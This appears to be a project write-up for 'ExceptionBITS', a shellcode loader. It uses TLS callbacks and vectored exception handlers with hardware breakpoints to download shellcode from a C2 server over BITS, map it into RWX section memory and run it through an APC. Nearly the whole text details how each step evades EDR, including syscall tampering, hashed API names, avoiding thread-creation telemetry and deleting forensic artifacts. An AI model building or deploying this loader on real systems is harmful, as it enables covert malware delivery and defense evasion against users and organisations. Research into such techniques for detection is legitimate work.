ExceptionBITS
A loader for demonstrating download and execution of shellcode using nested vectored exception handlers and BITS
ExceptionBITS is a hardware-breakpoint-based loader that sets up hardware breakpoints and the Vectored Exception Handler (VEH) even before execution of the main thread, using TLS callbacks. The idea is to put the checkpoints on obscure memory locations or external functions in a benign-looking application. These breakpoint "checkpoints", when hit, raise an EXCEPTION_SINGLE_STEP exception, and the handling of that exception is where the magic happens.
While handling it, the VEH controls the execution flow of the program. The main VEH downloads the shellcode from a C2/remote server using the Windows Background Intelligent Transfer Service (BITS), stores the payload in mapped memory and finally executes it in an Asynchronous Procedure Call (APC).
In order to circumvent user-mode hooks, ExceptionBITS uses something similar to syscalls tampering by rad9800 and Tampered Syscalls Via Hardware BreakPoints by Maldev-Academy. Syscall tampering is implemented as follows:
First the VEH calculates the SSN for the required Zw* "malicious" functions from ntdll.dll's export table and uses the sorted index as the SSN.
The VEH then calls a benign NTAPI such as NtQuerySecurityObject with some function arguments.
It then hooks onto that benign NTAPI by placing a hardware breakpoint at the start of the syscall stub.
The CRITICAL_SECTIONS are then synchronized to prevent race conditions.
In the nested VEH for the "malicious" functions, the SSN of the benign function in the RAX register is replaced with the SSN of the "malicious" function.
Finally the desired number of parameters are replaced and the function is executed.
This is repeated for all the "malicious" functions.
Overall Program Flowchart

Detailed Working Of ExceptionBITS
ExceptionBITS operates through four distinct stages:
TLS initialization → Main execution → Payload delivery → Syscall tampering.
We will go through all the stages one by one in the sections below.
TLS Initialization
1.1 TLS Callback registration
#pragma comment (linker, "/INCLUDE:_tls_used") forces the linker to include the _tls_used symbol, which tells Windows that this executable contains TLS data and callbacks.
The #ifdef _WIN64 block handles platform-specific symbol naming. On x86, symbols are prefixed with an underscore, so _HWBPTlsCallback is used instead of HWBPTlsCallback.
#pragma const_seg(".CRT$XLB") places the next variable into a special PE section called .CRT$XLB. The .CRT$XL* sections (ranging from .CRT$XLA to .CRT$XLZ) are reserved by the C Runtime for the array of TLS callback pointers.
The callback pointer HWBPTlsCallback is assigned to point to HWBPTlsCallbackFunction, which will be called automatically by the Windows loader.
The .CRT$XLB section is important because the linker merges the .CRT$XL* sections alphabetically (XLA, XLB, XLC...) into the TLS callback array, and the Windows loader invokes every callback in that array during process initialization, before the main() entry point executes. Placing the callback pointer in XLB puts it directly after the array's start marker in XLA, so it runs early. This gives ExceptionBITS a pre-execution window in which security monitoring tools may not yet be fully active.
1.2 TLS Callback Function Implementation
dwReason == DLL_PROCESS_ATTACH checks whether this callback is being invoked during process initialization. TLS callbacks receive the same reason codes as DllMain (DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH, DLL_PROCESS_DETACH).
tls_thread_id = GetCurrentThreadId() stores the main thread's ID, which is used later to verify that context restoration happens on the same thread.
AddVectoredExceptionHandler(1, VectoredHandler) registers a Vectored Exception Handler (VEH). VEHs are called before structured exception handlers (SEH) when exceptions occur. The first argument determines the order: a nonzero value places the handler at the front of the VEH list so it is called first, while zero places it at the end.
CONTEXT ctx = { 0 } initializes a CONTEXT structure, which represents the CPU's register state for a thread.
ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS specifies that we want to manipulate the debug registers (Dr0-Dr7).
GetThreadContext(thread, &ctx) retrieves the current register state of the thread.
ctx.Dr0 = (DWORD64)&DummyFunction sets the Dr0 debug register to the memory address of DummyFunction. Dr0-Dr3 are address registers that can hold breakpoint addresses.
ctx.Dr7 = 0x00000001 configures the Dr7 control register. The value 0x00000001 sets bit 0 (L0), which enables the breakpoint stored in Dr0 as a local (thread-specific) breakpoint.
ctx.Dr6 = 0 clears the Dr6 status register, which tracks which breakpoints have fired.
SetThreadContext(thread, &ctx) applies the modified register state back to the thread, activating the hardware breakpoint.
saved_context = ctx stores the entire context (including the breakpoint configuration) in a global variable for later restoration.
By setting only bit 0 (0x00000001), the loader creates an execution breakpoint on Dr0. When the CPU's instruction pointer reaches the address stored in Dr0, it generates a SINGLE_STEP exception instead of executing the instruction. This is harder for security tools to trace than traditional function calls.
The context is saved because Windows may clear debug registers when transitioning between kernel and user mode or during context switches. By saving it, the loader can restore the breakpoint if Windows clears it before main() executes.
Demo Target Function Call
__declspec(noinline) is a compiler directive that prevents the optimizer from inlining this function. Inlining would eliminate the function's distinct address, which would break the hardware breakpoint targeting.
The function body is intentionally empty because it will never actually execute. This is for demo purposes, but this function can be changed to any other external function or an obscure memory region.
typedef void (*pfunc_t)() defines a function pointer type that points to functions taking no arguments and returning void.
static pfunc_t volatile pDummy = DummyFunction creates a static, volatile function pointer. The volatile keyword prevents the compiler from optimizing away the indirection, ensuring the call goes through the pointer.
Using a function pointer instead of calling DummyFunction() can confuse static analysis tools. The volatile qualifier forces the compiler to generate actual memory access for the function pointer, preventing optimization that might make the call pattern obvious to signature-based detection.
Main Execution
2.1 Context Restoration
if (!context_saved) checks if the TLS callback successfully saved a context. If not, there's nothing to restore.
The function logs the current thread ID and the TLS thread ID to verify they match, ensuring we're restoring the context on the correct thread.
GetCurrentThread() returns a pseudo-handle to the current thread. This is always -2 and represents "the calling thread".
SetThreadContext(thread, &saved_context) reapplies the entire saved context, including the Dr0, Dr6, and Dr7 registers, effectively reactivating the hardware breakpoint on DummyFunction.
This restoration step is necessary because Windows may clear debug registers during thread context switches or when returning from kernel mode to user mode as a security measure. By restoring the context at the beginning of main(), ExceptionBITS ensures that the hardware breakpoint is active when pDummy() is called.
2.2 Main Function Flow
The function begins with verification that veh_handle is valid, confirming the TLS callback executed successfully.
RestoreSavedContext() reactivates the hardware breakpoint that may have been cleared by Windows.
pDummy() calls the function pointer pointing to DummyFunction. This is where execution hits the hardware breakpoint.
When the breakpoint triggers, the CPU immediately generates a SINGLE_STEP exception, and control transfers to VectoredHandler without executing any code in DummyFunction.
After VectoredHandler completes and returns EXCEPTION_CONTINUE_EXECUTION, execution resumes here at the instruction after pDummy().
GetTickCount() returns the number of milliseconds since system boot. This is used to implement a timeout mechanism.
SleepEx(1000, TRUE) puts the thread to sleep for 1000 ms (1 second), but with the second parameter TRUE, it enters an alertable wait state.
In an alertable wait, the kernel can interrupt the sleep to deliver Asynchronous Procedure Calls (APCs) queued to this thread.
result == WAIT_IO_COMPLETION indicates the sleep was interrupted by an APC. WAIT_IO_COMPLETION (value 0xC0) means an APC was delivered and executed.
The loop continues until either an APC executes or 10 seconds (APC_TIMEOUT) elapse, providing a timeout mechanism.
RemoveVectoredExceptionHandler(veh_handle) unregisters the main VEH to clean up.
HaltHardwareBreakpointHooking() removes the syscall tampering VEH and cleans up the critical section.
The pDummy() call triggers the entire payload delivery chain. The use of SleepEx with alertable wait is the correct way to allow APC execution in user mode. Regular Sleep() would not allow APCs to run. APCs are a kernel-level mechanism that allows one thread to queue a function to be executed by another thread, but they only execute when the target thread is in an alertable wait state (via functions like SleepEx, WaitForSingleObjectEx, etc.). The timeout mechanism prevents the program from hanging indefinitely if something goes wrong with the payload delivery.
Payload Delivery
3.1 Exception Filtering and Breakpoint Clearing
EXCEPTION_POINTERS* ExceptionInfo points to a structure holding two pointers: ExceptionRecord (details about the exception) and ContextRecord (CPU register state when the exception occurred).
static BOOL main_processing = FALSE is a static variable (persistent across function calls) used as a reentry guard. Once set to TRUE, subsequent calls to this handler during the same execution will immediately return.
ExceptionInfo->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP checks if the exception is the expected type. EXCEPTION_SINGLE_STEP (0x80000004) is generated by hardware breakpoints and the trap flag. If it's a different exception type, this handler isn't interested, so it returns EXCEPTION_CONTINUE_SEARCH to let other handlers process it.
if (shellcode_executed) and if (main_processing) are checks to prevent reentry. Once the main work is underway (main_processing = TRUE) or shellcode is running (shellcode_executed = TRUE), this handler steps aside and lets the syscall tampering handler deal with any further exceptions.
ExceptionInfo->ExceptionRecord->ExceptionAddress contains the instruction pointer (RIP/EIP) where the exception occurred. Logging this confirms it matches DummyFunction's address.
ctx.Dr0 = 0; ctx.Dr6 = 0; ctx.Dr7 = 0 clears all debug registers, disabling the hardware breakpoint on DummyFunction. This is critical because otherwise, returning EXCEPTION_CONTINUE_EXECUTION would cause the breakpoint to trigger again immediately, creating an infinite loop.
The reentry guards (main_processing and shellcode_executed) are essential because this is a global exception handler that will be called for EVERY SINGLE_STEP exception in the process. Once the main payload delivery logic runs, we don't want it to run again. The syscall tampering mechanism will generate many SINGLE_STEP exceptions (one for each tampered syscall), and those need to be handled by the dedicated syscall tampering VEH, not this handler. That VEH is registered with a first argument of 0, which places it at the end of the handler list, so it sees an exception only after this handler has declined it. By returning EXCEPTION_CONTINUE_SEARCH when appropriate, this handler cooperates with the other VEH in a multi-handler architecture.
3.2 Hash Calculation and Syscall Infrastructure
CALC_HASH("ZwCreateSection") is a macro that expands to CRC32BA("ZwCreateSection"), which computes a 32-bit CRC32 hash of the function name string.
The three hash calculations produce unique identifiers for the NT functions needed: ZwCreateSection (creates a memory section object), ZwMapViewOfSection (maps the section into the process's address space), and ZwQueueApcThread (queues an APC for execution).
Global variables g_ZwCreateSection_Hash, g_ZwMapViewOfSection_Hash, and g_ZwQueueApcThread_Hash store these hashes for later use by the TAMPER_SYSCALL macro.
InitHardwareBreakpointHooking() is a function that registers a second VEH specifically for intercepting the tampered syscalls. This VEH is registered with a first argument of 0, which appends it to the end of the handler list, so it is called after the main VEH (registered with 1) has returned EXCEPTION_CONTINUE_SEARCH.
If initialization fails, the function resets the flags and returns EXCEPTION_CONTINUE_EXECUTION to allow the program to continue (though it won't function correctly).
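To make the hashing step concrete, here is a minimal sketch of a bitwise CRC-32 over a NUL-terminated string. It assumes the standard reflected polynomial 0xEDB88320 with the usual initial value and final inversion; the CRC32BA macro in the project may use a different variant or a compile-time implementation. The function name crc32_str is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Standard CRC-32 (reflected polynomial 0xEDB88320) of a NUL-terminated
 * string. Assumption: this is the common zlib-style variant; the loader's
 * CRC32BA macro is not shown in the text and may differ. */
uint32_t crc32_str(const char *s)
{
    uint32_t crc = 0xFFFFFFFFu;

    assert(s != NULL);
    for (; *s != '\0'; ++s) {
        crc ^= (uint8_t)*s;
        for (int bit = 0; bit < 8; ++bit) {
            /* If the low bit is set, shift and XOR in the polynomial;
             * otherwise just shift. The mask is all ones or all zeros. */
            uint32_t mask = 0u - (crc & 1u);
            crc = (crc >> 1) ^ (0xEDB88320u & mask);
        }
    }
    return ~crc;
}
```

With this variant, the well-known check string "123456789" hashes to 0xCBF43926, which is a quick way to confirm an implementation matches the standard.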
3.3 BITS-Based Shellcode Download
IBackgroundCopyManager* pManager = NULL declares a pointer to the BITS manager interface. BITS (Background Intelligent Transfer Service) is a Windows component designed for reliable background file transfers.
HRESULT hr stores return values from COM methods. COM uses HRESULT values where negative numbers (< 0) indicate failure, and non-negative numbers indicate success.
CoInitializeEx(NULL, COINIT_MULTITHREADED) initializes the COM library for the multi-threaded apartment model. This is required before using any COM interfaces.
FAILED(hr) is a macro that checks if hr < 0, indicating a COM error.
GetTempPathA(MAX_PATH, tempPath) retrieves the path to the user's temporary directory (typically C:\Users\<username>\AppData\Local\Temp).
strcat_s(tempPath, MAX_PATH, "shellcode.tmp") appends "shellcode.tmp" to the temp path, creating a full file path for the download destination.
CoCreateInstance(&CLSID_BackgroundCopyManager, ...) creates an instance of the BITS Background Copy Manager COM object. The CLSID_BackgroundCopyManager is the unique identifier {4991d34b-80a1-4291-83b6-3328366b9097}.
pManager->lpVtbl->CreateJob(...) creates a new BITS job named "HWBP_Download" of type BG_JOB_TYPE_DOWNLOAD (value 0). BITS jobs can be downloads, uploads, or upload-replies.
MultiByteToWideChar(CP_UTF8, 0, url, -1, NULL, 0) calculates the number of wide characters needed to represent the UTF-8 URL string. Calling it with NULL and 0 for the output parameters makes it return the required buffer size.
malloc(urlLen * sizeof(WCHAR)) allocates memory for the wide character string. WCHAR is 2 bytes on Windows.
The second MultiByteToWideChar call actually performs the conversion from multi-byte (UTF-8) to wide character (UTF-16), which BITS requires.
pJob->lpVtbl->AddFile(pJob, wUrl, wTempPath) adds a file transfer to the job, specifying the remote URL and local destination path.
pJob->lpVtbl->Resume(pJob) starts the download. BITS jobs are created in a suspended state and must be explicitly resumed.
The do-while loop polls the job state every 300 ms. GetState returns values like BG_JOB_STATE_QUEUED (0), BG_JOB_STATE_CONNECTING (1), BG_JOB_STATE_TRANSFERRING (2), BG_JOB_STATE_ERROR (4), or BG_JOB_STATE_TRANSFERRED (6).
pJob->lpVtbl->Complete(pJob) finalizes the job, moving the temporary file to its final destination. BITS downloads to a temporary location first.
CreateFileA opens the downloaded file with GENERIC_READ access.
GetFileSize retrieves the file size. The validation fileSize > maxSize prevents buffer overflows.
ReadFile reads the entire file content into the provided buffer.
The cleanup section uses goto for error handling, ensuring COM objects are released, memory is freed, and the temporary file is deleted regardless of how the function exits.
BITS was chosen for several reasons. First, it is a legitimate Windows service used by Windows Update, Microsoft Store, and many enterprise applications, so BITS traffic is common and expected, and network monitoring is less likely to flag it as suspicious. Second, BITS handles network interruptions gracefully; if the connection drops, BITS automatically resumes when connectivity returns, making the download highly reliable. Third, BITS respects network throttling policies and uses idle bandwidth, making it less likely to trigger network anomaly detection based on bandwidth usage patterns. Fourth, BITS jobs persist across reboots, i.e., if the system restarts during download, BITS resumes automatically. However, this also means forensic investigators could find evidence of the BITS job in Windows event logs and BITS database files, which is why the cleanup is thorough. The conversion to wide character strings is necessary because BITS's COM interface expects UTF-16 strings (Windows's internal Unicode format). The polling loop could be replaced with BITS's callback mechanism for efficiency, but polling is simpler and avoids registering additional COM callbacks that might leave forensic artifacts. The immediate deletion of the temporary file after reading it into memory minimizes the window during which the shellcode exists on disk. In a more sophisticated version, the downloaded file could be encrypted and decrypted in memory only, never touching disk in decrypted form.
3.4 Memory Allocation via Tampered Syscalls
PBYTE pPayload is a pointer to the downloaded shellcode buffer, SIZE_T sPayloadSize is its size in bytes, and PVOID* ppAddress is an output parameter that will receive the address of the allocated memory.
LARGE_INTEGER MaximumSize is a 64-bit integer structure used to specify sizes larger than 32 bits. QuadPart accesses it as a single 64-bit value.
The TAMPER_SYSCALL macro invokes the syscall tampering mechanism. The first parameter is the hash of the target function (ZwCreateSection), followed by that function's parameters.
For ZwCreateSection: &hSection (output handle), SECTION_ALL_ACCESS (0xF001F, all access rights), NULL (no object attributes), &MaximumSize (section size), PAGE_EXECUTE_READWRITE (0x40, RWX memory protection), SEC_COMMIT (0x8000000, commit physical storage), then NULL padding for additional parameters.
(HANDLE)-1 is a pseudo-handle meaning "current process". It's the equivalent of GetCurrentProcess() but as a constant.
For ZwMapViewOfSection: hSection (section handle), (HANDLE)-1 (target process), &pAddress (output base address), NULL (zero bits, meaning no specific address requirements), NULL (commit size), NULL (section offset), &sViewSize (view size), ViewUnmap (2, inheritance disposition), NULL (allocation type), PAGE_EXECUTE_READWRITE (protection), then NULL padding.
memcpy(pAddress, pPayload, sPayloadSize) copies the shellcode bytes from the temporary buffer to the newly allocated executable memory.
hFileMapping = hSection stores the section handle globally for later cleanup.
*ppAddress = pAddress writes the allocated address to the output parameter, so the caller knows where the shellcode is.
Section objects are kernel objects that represent shared memory regions. Unlike VirtualAlloc which directly allocates memory in a process, section objects are created in kernel space then mapped into user space. This is more flexible but also less commonly monitored by EDR. Many security products focus on VirtualAllocEx or NtAllocateVirtualMemory for detecting malicious memory allocation, but ZwCreateSection/ZwMapViewOfSection is an alternative path that's often under-monitored. Allocating with PAGE_EXECUTE_READWRITE immediately is a red flag in modern security analysis; most legitimate code allocates memory with PAGE_READWRITE, writes code to it, then changes protection to PAGE_EXECUTE_READ. However, since this loader is using syscall tampering, the actual Win32 API being monitored (VirtualAllocEx) is never called, so permission-based heuristics that watch API parameters are bypassed. The section object persists even if the handle is closed, as long as there's a mapped view, which is why CloseHandle can safely be called on error paths. The ViewUnmap parameter (value 2) specifies that child processes won't inherit this mapping, which is appropriate for shellcode injection.
3.5 APC Queueing
static char tempBuffer[MAX_SHELLCODE_SIZE] declares a 4096-byte buffer. Because it is static, it lives in the image's data section rather than on the stack. Static local variables persist across function calls and are zero-initialized.
DownloadShellcode is called with the URL, buffer, and maximum size. It returns the number of bytes actually read.
If download fails (shellcode_size == 0), the function resets flags and returns EXCEPTION_CONTINUE_EXECUTION, which resumes execution after the pDummy() call in main().
FileMapInjectTampered allocates executable memory and copies the shellcode. On failure, the same error handling applies.
For ZwQueueApcThread: GetCurrentThread() (target thread handle), (PVOID)shellcode_buffer (APC routine address, which is the shellcode entry point), then 10 NULL parameters (for APC arguments and system-specific use).
shellcode_executed = TRUE and main_processing = FALSE update global state flags.
return EXCEPTION_CONTINUE_EXECUTION tells Windows to resume execution. The CPU will return to the instruction after pDummy() in main().
The APC (Asynchronous Procedure Call) mechanism is a Windows kernel feature that allows one context to request that code be executed in another thread's context. APCs come in two types: user-mode and kernel-mode. This loader uses user-mode APCs, which only execute when the target thread enters an alertable wait state. The key point of this approach is that the shellcode runs in the context of the loader's own main thread, not a newly created thread. Thread creation is one of the most monitored events in process security; EDR and AV products commonly track CreateThread, CreateRemoteThread, and NtCreateThreadEx calls. By using an APC on an existing thread, the loader avoids thread-creation telemetry. The shellcode appears to execute spontaneously during a SleepEx call, which looks like a normal thread waiting for I/O. The NULL parameters to ZwQueueApcThread are placeholders, i.e., the function signature allows passing arguments to the APC routine, but shellcode typically doesn't expect arguments (it's position-independent and self-contained). The fact that EXCEPTION_CONTINUE_EXECUTION returns execution to main() shows the exception was handled successfully, the breakpoint is cleared, and execution continues normally. If this returned EXCEPTION_CONTINUE_SEARCH, Windows would look for other exception handlers, potentially triggering termination if no handler claims the exception.
Syscall Tampering
4.1 SSN Discovery Through Export Table Parsing
GetModuleHandleA("ntdll.dll") retrieves the module handle of ntdll.dll, which is already loaded in every Windows process. The returned HMODULE is the base address where the DLL is mapped.
PIMAGE_DOS_HEADER pDosHeader points to the DOS header, which starts with the signature "MZ" (0x5A4D). Every PE file begins with this legacy DOS header.
pDosHeader->e_lfanew is an offset to the PE header (IMAGE_NT_HEADERS). In ntdll.dll, this is typically 0xF0.
pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE verifies the PE signature is "PE\0\0" (0x00004550).
DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] accesses the export directory entry (index 0) in the data directory array. This contains the RVA and size of the export table.
PIMAGE_EXPORT_DIRECTORY points to a structure containing three important arrays: AddressOfNames (RVAs of function name strings), AddressOfFunctions (RVAs of function code), and AddressOfNameOrdinals (indices mapping names to addresses).
*(unsigned short*)pFunctionName == 'wZ' checks if the first two characters are 'Z' and 'w' by treating them as a 16-bit integer. In little-endian (which x86/x64 uses), the first character 'Z' (0x5A) lands in the low byte and 'w' (0x77) in the high byte, forming the value 0x775A, which is what the multi-character constant 'wZ' evaluates to.
HASH_STR(pFunctionName) computes the CRC32 hash of the function name.
uNtdllBase + pdwFunctionAddressArray[pwFunctionOrdinalArray[i]] calculates the absolute address of the function. The ordinal array provides an index into the address array, and adding the base address converts the RVA to a virtual address.
The bubble sort orders functions by address. This is intentional because in Windows, the SSN of a function corresponds to its position when syscalls are sorted by address.
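The two header checks described above (the "MZ" signature, then the "PE\0\0" signature at e_lfanew) can be sketched portably against a raw byte buffer. This is only an illustration of the header layout, not the project's code: pe_header_offset is a hypothetical name, and it reads e_lfanew from its fixed offset 0x3C instead of using the Windows IMAGE_DOS_HEADER type so that it compiles anywhere.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns the offset of the "PE\0\0" signature inside buf, or -1 if the
 * buffer does not look like a PE image. Hypothetical helper for
 * illustration; field offsets follow the documented PE/COFF layout. */
long pe_header_offset(const uint8_t *buf, size_t len)
{
    uint32_t e_lfanew;

    assert(buf != NULL);

    /* The DOS header is 0x40 bytes and starts with 'M' 'Z' (0x5A4D). */
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return -1;

    /* e_lfanew is a little-endian 32-bit value at offset 0x3C. */
    e_lfanew = (uint32_t)buf[0x3C]
             | (uint32_t)buf[0x3D] << 8
             | (uint32_t)buf[0x3E] << 16
             | (uint32_t)buf[0x3F] << 24;

    /* Bounds-check before touching the signature. */
    if (e_lfanew > len || len - e_lfanew < 4)
        return -1;

    /* IMAGE_NT_SIGNATURE is the four bytes 'P' 'E' 0 0 (0x00004550). */
    if (memcmp(buf + e_lfanew, "PE\0\0", 4) != 0)
        return -1;

    return (long)e_lfanew;
}
```

The explicit bounds checks matter when the input is an untrusted file rather than a module the loader has already mapped and validated.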
This PE parsing manually walks ntdll's export table to enumerate all syscalls. Windows ntdll.dll exports two parallel sets of syscall wrapper names: Nt* and Zw*. In user mode both names resolve to the same stubs and invoke the same kernel-mode functions; they only behave differently when called from kernel mode (not relevant here). ExceptionBITS resolves the Zw* names. The SSN of a stub corresponds to its position when the stubs are sorted by address: the stub at the lowest address has SSN 0, the next one has SSN 1, and so on. This ordering is consistent within a Windows build but changes between versions (e.g., Windows 10 vs. Windows 11). By dynamically discovering this ordering at runtime, ExceptionBITS adapts to different Windows versions without hardcoded SSNs. The limitation is that this technique only works for Zw* functions exported from ntdll; if a syscall isn't exported or is obfuscated, this won't find it. The bubble sort is inefficient (O(n²)), but with only ~400-500 Zw functions in ntdll, it completes in milliseconds. The use of RVAs (Relative Virtual Addresses) in PE files is important as they're offsets from the base address, allowing the same DLL to load at different addresses due to ASLR without breaking references.
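The two-byte prefix comparison is easy to get backwards, so here is a small portable sketch of it. It assumes a little-endian host (as on x86/x64) and uses memcpy instead of a pointer cast to avoid unaligned or aliasing-unsafe reads; starts_with_zw is a hypothetical name, and the constant 0x775A is written out rather than relying on the compiler-specific value of the multi-character literal 'wZ'.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns 1 if name begins with "Zw", 0 otherwise.
 * Assumption: little-endian host, so the bytes 'Z' (0x5A) then 'w' (0x77)
 * load as the 16-bit value 0x775A. */
int starts_with_zw(const char *name)
{
    uint16_t first_two;

    assert(name != NULL);

    /* An empty string has only its terminator; do not read two bytes. */
    if (name[0] == '\0')
        return 0;

    /* name[0] is non-NUL, so name[1] exists (it may be the terminator). */
    memcpy(&first_two, name, sizeof first_two);
    return first_two == 0x775A;
}
```

On a big-endian host the same two bytes would load as 0x5A77, which is why the comparison is tied to the byte order of the target architecture.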
4.2 Fetching the System Service Number (SSN) by Hash
This function is the bridge between the hash-based identification of syscalls and their actual SSN, which is required for the kernel to execute the correct system call. By using hashes, the loader avoids storing or referencing sensitive function names directly, making static analysis and signature-based detection much harder. The dynamic resolution of SSNs means the loader is robust across Windows versions, as SSNs can change between builds.
4.3 Preparing the Tampered Syscall Hijack
This function is the heart of the tampering mechanism. By setting a hardware breakpoint on the syscall instruction of a benign function (the decoy), the loader ensures that when the decoy is called, execution will be intercepted just before the transition to kernel mode. This allows the loader to swap out the decoy's SSN and parameters for those of the real, sensitive syscall. The use of hardware breakpoints (rather than software breakpoints) makes this invisible to most user-mode monitoring tools and avoids modifying code in memory, which is a common detection vector.
4.4 Passing Parameters for the Tampered Syscall
The use of a critical section ensures that only one thread can modify the tampered syscall parameters at a time, preventing corruption or unexpected behavior. This is especially important in complex loaders that may operate in multi-threaded contexts or be injected into multi-threaded processes.
4.5 Installing the Hardware Breakpoint
By setting RW0 to 00 (execute) and LEN0 to 00 (1 byte), the loader ensures the breakpoint only triggers on instruction execution at the exact address. Setting L0 to 1 enables the breakpoint for the current thread only, making it invisible to other threads and harder to detect.
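The Dr7 field layout referred to here can be written out as plain bit arithmetic. The sketch below follows the layout documented in the Intel SDM (local-enable bit L<n> at bit 2n, RW<n> at bits 16+4n, LEN<n> at bits 18+4n); the helper name dr7_local_bits is hypothetical and it only computes a value, it does not touch any thread context.

```c
#include <assert.h>
#include <stdint.h>

/* Compute the Dr7 bits that enable one local breakpoint slot.
 *   slot: 0..3, selects Dr0..Dr3
 *   rw:   2-bit condition (00 = instruction execution)
 *   len:  2-bit length    (00 = 1 byte, required for execution breakpoints)
 * Hypothetical helper; bit positions follow the Intel SDM layout. */
uint64_t dr7_local_bits(unsigned slot, unsigned rw, unsigned len)
{
    uint64_t value = 0;

    assert(slot < 4);

    value |= 1ULL << (slot * 2);                       /* L<slot> enable bit */
    value |= (uint64_t)(rw  & 3u) << (16 + slot * 4);  /* RW<slot> field     */
    value |= (uint64_t)(len & 3u) << (18 + slot * 4);  /* LEN<slot> field    */
    return value;
}
```

For slot 0 with RW0 = 00 and LEN0 = 00 this yields 0x00000001, which matches the Dr7 value used in the TLS callback.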
4.6 Exception Handler for Tampered Syscall Execution
The exception handler directly manipulates the CPU's register state, swapping out the decoy values for the real ones just before the syscall instruction executes. This means the kernel receives the real syscall and parameters, even though the user-mode code called a benign function. This bypasses user-mode hooks, IAT/EAT patching, and most EDR monitoring, as the actual syscall transition is never made through the monitored API.
Results And Screenshots
Execution On Target System




Callback To Remote Server
